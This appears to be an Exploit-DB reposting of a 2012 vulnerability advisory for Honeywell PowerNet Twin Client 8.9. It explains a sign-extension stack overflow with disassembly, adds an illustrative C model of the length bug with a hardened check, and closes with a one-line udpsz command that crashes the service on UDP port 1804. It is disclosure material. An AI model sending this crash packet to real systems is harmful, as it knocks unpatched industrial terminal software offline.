PowerNet Twin Client 8.9 – ‘RFSync 1.0.0.1’ Crash (PoC)

  • Author: Luigi Auriemma
  • Date: 2012-06-29
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/19456/
    #######################################################################
    
     Luigi Auriemma
    
    Application: PowerNet Twin Client
    http://www.honeywellaidc.com/en-US/Pages/Product.aspx?category=Software&cat=HSM&pid=PowerNet%20Twin%20Client
    Versions: <= 8.9 (RFSync 1.0.0.1)
    Platforms: Windows
    Bug: unexploitable stack overflow
    Exploitation: remote
    Date: 29 Jun 2012
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    From the vendor's website:
    "PowerNet Twin Client v8.9 PowerNet Twin Client is a serverless,
    terminal based software used in 2.4 GHz networks."
    
    
    #######################################################################
    
    ======
    2) Bug
    ======
    
    
    The software uses the function 00403cb0 to read 100 bytes from the
    incoming connection and then uses a signed 8-bit value supplied by the
    client as the length for copying this data into a stack buffer:
    
    00403DCB  |. 0FBE4424 29      MOVSX EAX,BYTE PTR SS:[ESP+29]     ; 8bit size with 8->32bit
    00403DD0  |. 8B8C24 38020000  MOV ECX,DWORD PTR SS:[ESP+238]     ; integer expansion bug
    00403DD7  |. 83C4 08          ADD ESP,8
    00403DDA  |. 48               DEC EAX                            ; integer overflow
    00403DDB  |. 85C9             TEST ECX,ECX
    00403DDD  |. 74 02            JE SHORT RFSync.00403DE1
    00403DDF  |. 8901             MOV DWORD PTR DS:[ECX],EAX
    00403DE1  |> 8B9424 2C020000  MOV EDX,DWORD PTR SS:[ESP+22C]
    00403DE8  |. 85D2             TEST EDX,EDX
    00403DEA  |. 74 29            JE SHORT RFSync.00403E15
    00403DEC  |. 8BC8             MOV ECX,EAX
    00403DEE  |. 8BD9             MOV EBX,ECX
    00403DF0  |. C1E9 02          SHR ECX,2
    00403DF3  |. 8BFA             MOV EDI,EDX
    00403DF5  |. 8D7424 23        LEA ESI,DWORD PTR SS:[ESP+23]      ; stack overflow
    00403DF9  |. F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
    
    So a size byte of 0x80 is sign-extended to 0xffffff80, and so on for
    every value with the high bit set.
    
    Unfortunately this vulnerability cannot be exploited to execute code,
    because there is no way to control the data located after the packet,
    which has a fixed size of 100 bytes: the result is just a Denial of
    Service.
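As an added illustration that is not part of the advisory or the vendor's code, the C model below mirrors the length computation in the disassembly (MOVSX, then DEC, then use as an unsigned REP MOVSD count) beside a hardened variant that zero-extends the byte and bounds it against what was actually received; the destination capacity passed in main() is an assumed value, and the sample size bytes are constructed.

```c
#include <stddef.h>
#include <stdio.h>

/* Fixed packet size read from the connection, as stated in the advisory. */
#define PKT_SIZE 100

/* Mirrors MOVSX EAX,BYTE PTR [ESP+29]: the 8-bit size is sign-extended
   to 32 bits, so 0x80..0xff become 0xffffff80..0xffffffff. */
unsigned int sign_extended_size(unsigned char size_byte) {
    int eax = (signed char)size_byte;   /* MOVSX */
    return (unsigned int)eax;
}

/* Mirrors DEC EAX followed by the use of EAX as the REP MOVSD count
   (before SHR ECX,2). A size byte of 0x00 underflows to 0xffffffff, and
   0x80..0xff remain huge because the sign-extended value is negative. */
unsigned int vulnerable_copy_len(unsigned char size_byte) {
    int eax = (signed char)size_byte;   /* MOVSX */
    eax--;                              /* DEC EAX: no check before use */
    return (unsigned int)eax;           /* consumed as an unsigned count */
}

/* Hardened variant: zero-extend the byte, reject a zero length, and refuse
   a copy that exceeds either what was received or the destination size.
   Returns the accepted length, or -1 when the packet must be dropped. */
long safe_copy_len(unsigned char size_byte, size_t received, size_t dst_cap) {
    size_t len = size_byte;             /* MOVZX semantics, never MOVSX */
    if (len == 0) return -1;
    len -= 1;
    if (len > received || len > dst_cap) return -1;
    return (long)len;
}

int main(void) {
    /* Constructed sample size bytes; the destination capacity is assumed
       equal to the packet size for this demonstration. */
    unsigned char samples[] = { 0x41, 0x7f, 0x80, 0xff, 0x00 };
    for (size_t i = 0; i < sizeof samples; i++) {
        unsigned char b = samples[i];
        printf("size byte 0x%02x: sign-extended 0x%08x, copy len 0x%08x, safe %ld\n",
               b, sign_extended_size(b), vulnerable_copy_len(b),
               safe_copy_len(b, PKT_SIZE, PKT_SIZE));
    }
    return 0;
}
```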
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip
    
    
    udpsz -T -b 0x41 -C "11 00" SERVER 1804 100
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################